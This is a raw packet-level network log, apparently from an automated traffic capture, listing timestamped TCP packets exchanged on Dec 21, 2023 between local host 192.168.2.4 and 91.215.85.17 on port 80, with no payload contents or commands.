                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070414066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070450068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070558071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070600033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070612907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070723057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070758104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070766926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070822001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070868015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070899010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070981979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071034908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071069956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071120977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071185112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071345091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071644068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071696043 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071724892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071815014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071860075 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.071893930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.072000980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.072062969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.072087049 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.072160006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.072199106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.322782993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.322834015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.322901011 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.322918892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323014975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323065996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323069096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323165894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323215008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323292017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323389053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323441982 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323445082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323493004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323551893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323566914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323589087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323635101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323674917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323734999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323776960 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323800087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323834896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323879004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323887110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.323947906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324027061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324050903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324107885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324193954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324757099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324855089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.324950933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325118065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325196028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325265884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325314045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325349092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325383902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325469971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325577021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325615883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325865984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325925112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.325989008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326096058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326173067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326220989 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326251030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326301098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326397896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326422930 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326472998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326531887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326678038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326770067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326823950 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326864004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326932907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.326975107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327008009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327076912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327156067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327167988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327270031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327307940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327339888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327387094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327446938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327523947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327636003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327685118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327800035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327882051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327923059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.327976942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328136921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328224897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328275919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328366995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328419924 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328469992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328548908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328593969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328661919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328677893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328736067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328752995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328860044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328907013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.328938007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329006910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329091072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329106092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329205036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329255104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329276085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329375029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329452991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329452991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329585075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329627991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329696894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329730988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329768896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329828978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329905987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329962015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.329972029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330034018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330074072 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330084085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330142021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330183029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330213070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330291986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330344915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330364943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330492973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330586910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330641985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330676079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330740929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330787897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330862045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330925941 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.330955982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331023932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331084967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331099033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331173897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331248999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331264019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331347942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331394911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331515074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331568956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331587076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331614971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331809998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331860065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331891060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.331954002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332025051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332041979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332087040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332143068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332153082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332201004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332267046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332297087 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332344055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332402945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332403898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332492113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332535982 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332602024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332685947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332742929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332751989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332901955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.332940102 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333002090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333039045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333097935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333101988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333223104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333270073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333297014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333358049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333404064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333431005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333534956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333579063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333600998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333682060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333719015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333755016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333883047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333920956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.333969116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334048986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334106922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334137917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334201097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334234953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334311008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334449053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334496021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334614992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334709883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334748983 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334795952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334897995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334938049 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.334961891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335067987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335114956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335165024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335258961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335319996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335351944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335418940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335485935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335521936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335597038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335673094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335685015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335746050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335789919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.335835934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336186886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336224079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336241961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336289883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336329937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336359978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336451054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336509943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336533070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336625099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336692095 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336750984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336846113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.336884022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.337028980 CET804973891.215.85.17192.168.2.4
